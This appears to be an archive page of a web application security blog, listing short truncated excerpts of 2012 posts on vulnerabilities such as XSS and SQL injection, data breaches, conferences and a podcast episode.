Surviving the Week 10/19/12
Security Flaw Found in Steam Hackers could have a new means of accessing your computer through a browser command that uses Valve’s software distribution system […]
Security Flaw Found in Steam Hackers could have a new means of accessing your computer through a browser command that uses Valve’s software distribution system […]
The Cloud is a Scary Place Security lapses in XSS, CSRF, SQLi, or authentication bypass are not always easy to uncover for cloud companies such […]
Enterprises Struggle With Business Logic Attacks, Survey Finds A new survey emphasizes how business logic attacks can slip under the radar of development teams and […]
Passwords of 100k IEEE members lie bare on FTP server IEEE uses Akamai for content delivery. A FTP directory server was discovered which contained log […]
2012 HouSecCon, 10/11/2012 (in Houston) HouSecCon is coming up – October 11th in Houston. The agenda is shaping up with a bunch of hot topics […]
Surviving SQL Injection (link to free SQL Injection tool) SQLInjection continues to be in the news each week. Despite the fact that it the most […]
A Number of Exploits Including SQL Injection, XSS, and Authentication Bypass This week, researchers found some remarkable vulnerabilities including Remote code execution, SQL Injection, and […]
XSS: Gaining Access to HttpOnly Cookie Using the method getHeaderField in the Java HTTP API, any applet can access cookies with the HttpOnly flag set. […]
Get Off Your AMF and Don’t REST On JSON At “BSides Los Angeles“, I presented on “Get off your AMF and don’t REST on JSON”. […]
Sorry readers, last week’s post was missed due to an overwhelming amount of work both on the professional and personal areas. Thank you for holding […]
Web Apps Experience 2,700+ Attacks Per Year In a recent study, Imperva found that the average application can expect attack incidents 120 days per year […]
HTML5 Top 10 Attacks Last week at Blackhat, our team member Shreeraj Shah presented on threats against HTML5. The talk discussed the Top 10 Threats […]
CodeIgniter 2.1.1 Cross Site Scripting Bypass CodeIgniter is an open source Web Application Framework that helps authors write PHP applications. Version 2.1.1 of CodeIgniter suffers […]
Black Hat 2012 Coverage Dark Reading put together a list of interesting talks to headline at Black Hat this year. Check out their preview links. […]
Nvidia developer forums had been hacked, 400,000 user account compromised. More games with “Who’s got the biggest bounty?” 400,000 is fairly respectable. Remember back in […]
Huge SQL injection knowledge base NTObjectives released a SQL Injection cheat sheet which can be found at http://www.ntobjectives.com/go/sql-injection-cheat-sheet/, A more comprehensive knowledge base of SQL injection […]
Code Execution Vulnerability in Microsoft XML Core Services If you are calling “msxml3!_dispatchImpl::InvokeHelper” in your code, make sure to patch it. A vulnerability exists when […]
10 Vulnerable Web Applications You Can Play With There are number of vulnerable web applications to be discoverd. Many times we are asked for known […]
United States Department of Defense data leaked by Anonymous hackers A group named “Wikiboat” attacked the website of the Department of Defense and gained access […]
LinkedIn confirms hack, over 60% of stolen passwords already cracked Linkedin, one of the most popular professional social engineering sites has confirmed a compromise of […]
A very interesting update on Flame, malware targeting Middle Eastern countries, from Alexander Gostev at Kaspersky today about Microsoft, the trusted certificate authority. Malware is a […]
Revealed: Hundreds of words to avoid using online if you don’t want the government spying on you This week, The Department of Homeland Security has […]
Not that it has been a quiet week in the web application seucrity arena, it was simply a busy week. Microsoft’s SDL Expands Beyond Redmond […]
Hmmm Lets see if I even remember how to enter this stuff anymore… Yeap you guessed it, we finally recorded another episode – WOOT! Show […]
Podcast: Play in new window | Download (Duration: 51:43 — 72.7MB)
Subscribe: Apple Podcasts | RSS
WAF Wars WAF is more commonly used as an IDS rather than IPS, This is mainly due to the amount of alerts they generate when […]
Copyright © 2024 | WordPress Theme by MH Themes